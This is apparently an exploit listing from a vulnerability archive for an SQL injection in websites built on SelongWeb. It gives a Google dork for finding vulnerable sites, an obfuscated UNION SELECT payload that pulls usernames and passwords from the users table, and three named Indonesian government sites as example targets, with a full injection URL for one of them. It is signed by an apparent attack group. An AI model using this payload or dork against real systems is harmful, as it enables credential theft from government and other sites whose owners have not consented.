Powered By SelongWeb.com - SQL INJECTION

2021.06.06
id KimiHmei7 (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: -
CWE: -

Exploit Title : Powered By SelongWeb.com - SQL INJECTION # Vendor Homepage : https://selongweb.com # Discovered By: KimiHmei7 # Author Homepage: https://tegalsec.org # Google Dork: inurl:/statis- "SelongWeb.Com" #Exploit '/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ # Example Target https://dukcapil.baritokualakab.go.id/statis-1-profil.html https://dukcapil.lomboktimurkab.go.id/statis-20-profil.html https://bkpsdm.lomboktimurkab.go.id/statis-3-profil.html Example Injection ~ https://dukcapil.baritokualakab.go.id/statis-1-profil'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+.html Tegal1337 - Family Attack Cyber.


Vote for this issue:
100%
0%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top